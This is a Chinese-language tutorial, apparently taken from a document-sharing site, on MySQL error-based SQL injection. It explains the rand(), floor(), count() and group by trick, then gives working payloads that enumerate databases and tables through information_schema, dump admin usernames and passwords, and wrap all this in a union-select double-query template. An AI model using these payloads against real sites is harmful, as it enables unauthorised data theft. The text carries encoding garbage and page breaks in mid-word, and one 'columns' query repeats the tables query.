資源描述:
《mysql報錯注入》由會員上傳分享,免費在線閱讀�,更多相關(guān)內(nèi)容在教育資源-天天文庫。
1����、Mysql 報錯注入SQL注入獲取數(shù)據(jù)庫數(shù)據(jù),利用的方法可以大致分為聯(lián)合查詢����、報錯、布爾盲注以及延時注入����,通常這些方法都是基于SELECT查詢語句中的SQL注射點來實現(xiàn)的。如果涉及非SELECT查詢的注入����,我們通常用到的就是mysql注入查詢創(chuàng)建一個test表USEtest;CREATETABLEtest(numint(5));INSERTINTOtestVALUES(1);INSERTINTOtestVALUES(2);INSERTINTOtestVALUES(3);INSERTINTOtestVALUES(4);SELECT*F
2、ROMtest;復(fù)制代碼主要涉及的mysql函數(shù)語句:1.Rand()#隨機(jī)函數(shù)2.Floor()#取整函數(shù)3.CONUNT()#匯總函數(shù)4.Groupby#分組語句復(fù)制代碼原理:當(dāng)在一個聚合函數(shù)�,比如CONUNT函數(shù)后面如果使用分組語句就會把查詢的一部分以錯誤的形式顯示出來--源于安全研究人員20/20簡單的例子:usetest;復(fù)制代碼然后簡單看一下CONCAT的用法SELECTCONCAT("a","b");復(fù)制代碼查詢什么就出來什么,下面分別看一下其它幾個函數(shù)的作用SELECTrand();復(fù)制代碼Rand()函數(shù),學(xué)過編程
3���、的人都應(yīng)該知道是一個產(chǎn)生隨機(jī)數(shù)的函數(shù)范圍在(0,1)之間的浮點數(shù)再看看floor()函數(shù)SELECTfloor(3.141216545);復(fù)制代碼20/20顯而易見�����,是一個取整的函數(shù)SELECTfloor(rand()*2);復(fù)制代碼Rand()的范圍是(0,1)*2==>(0,2)那么floor(rand()*2)取整后就是0和1兩個數(shù)SELECTCONCAT((SELECTdatabase()),floor(rand()*2));復(fù)制代碼如果我們將上面那句加上from某個表��,就會返回test0和test1的集合��,返回的長度有表的
4�����、記錄數(shù)決定,例如我們from一下test表����。返回了4行數(shù)據(jù)那么�,我們?nèi)绾芜^濾掉這些重復(fù)的信息呢?20/20這里就要用到groupby語句�����,groupby的作用是:用于結(jié)合合計函數(shù)�����,根據(jù)一個或多個列對結(jié)果集進(jìn)行分組。我們來查詢一下SELECTCONCAT((SELECTdatabase()),floor(rand()*2))asafromtestgroupbya;復(fù)制代碼這樣就不會有那么多無用的信息簡單解釋一下語句:CONCAT((SELECTdatabase()),floor(rand()*2))asa這個就是將列名重命名為a��,看圖
5���、對比一下即可知道Groupbya就是將根據(jù)a這個列的數(shù)據(jù)����,將查詢出來相同的數(shù)據(jù)分到一個組里面��,因此我們看到的數(shù)據(jù)就只有兩個不同的同理����,我們可以將database()換成其它你想要查詢的東西�,如version(),@@data等����。而我們注入的時候通常是通過mysql的information_schema這個數(shù)據(jù)庫來查詢信息,查詢數(shù)據(jù)名就查詢schemata的SCHEMA_NAME這個列暴庫select*frominformation_schema.schemata;復(fù)制代碼里面就是我的數(shù)據(jù)名字20/20爆表SELECTDISTINCT
6��、TABLE_NAMEFROMinformation_schema.tables;復(fù)制代碼爆列名SELECTDISTINCTTABLE_NAMEFROMinformation_schema.tables;復(fù)制代碼太長了我就不截圖了���,自己去看看吧爆字段就更簡單了直接查詢就是SELECTusername����,passwordFROMadmin;復(fù)制代碼假如存在這列名和表知道這些后我們利用報錯注入就可以�����,查詢到我們想要的數(shù)據(jù)了selectcount(*),concat((selectversion()),floor(rand()*2))asaf
7����、rominformation_schema.tablesgroupbya;復(fù)制代碼20/20為了好看你可以加一些標(biāo)記selectcount(*),concat('--',(selectuser()),'--',floor(rand()*2))asafrominformation_schema.tablesgroupbya;復(fù)制代碼更加高級的一點的就是,我們真正用到的雙注入查詢��,是select的嵌套子查詢�,就是select里面還有一個select查詢語句通常是一種固定的格式,適用于沒有回現(xiàn)位置和不能orderby確定的注入unions
8��、elect1from(select+count(*),concat(floor(rand(0)*2),(注入爆數(shù)據(jù)語句))afrominformation_schema.tablesgroupbya)b藍(lán)色部分就是我們之前講的基本報錯
